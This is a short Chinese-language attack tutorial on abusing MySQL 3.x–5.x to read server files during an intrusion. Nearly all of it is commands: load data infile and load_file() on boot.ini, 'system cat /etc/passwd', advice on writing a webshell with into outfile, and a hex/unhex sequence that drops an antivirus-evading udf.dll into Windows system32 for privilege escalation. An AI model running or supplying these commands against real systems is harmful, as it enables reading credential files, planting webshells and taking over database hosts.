一、mysql3.x下
不确定mysql3.x下能否使用load_file()函数(我在mysql3使用手册上没有查到,但貌似是可以的),用 load data infile 读取文件,命令如下:
mysql>create table a (cmd text); mysql>load data infile 'c:\\boot.ini' into table a; mysql>select * from a;
二、mysql4.x下
mysql4.x下除了 load data infile 外还可以用大家熟知的 load_file() 来读取,命令如下:
mysql>create table a (cmd text); mysql>insert into a (cmd) values (load_file('c:\\boot.ini')); mysql>select * from a;
三、mysql5.x下
在linux下,mysql5.x 除了上面两种方法,还可以利用 system 直接执行系统命令的方式来读取文件(是否必须root身份不确定,未测试),命令如下:
mysql>system cat /etc/passwd
mysql下读取文件在入侵中用到的时候不多,可能用于查询配置文件寻找web路径,或者webshell权限很小的时候读取其他格式的webshell内容然后用into outfile方式写入大马等,二进制文件也可以这样用,只是多了hex()和unhex()的工序。
例:把免杀过的udf.dll文件插入系统目录
create table a (cmd LONGBLOB); insert into a (cmd) values (hex(load_file('c:\\windows\\temp\\udf.dll'))); SELECT unhex(cmd) FROM a INTO DUMPFILE 'c:\\windows\\system32\\udf.dll';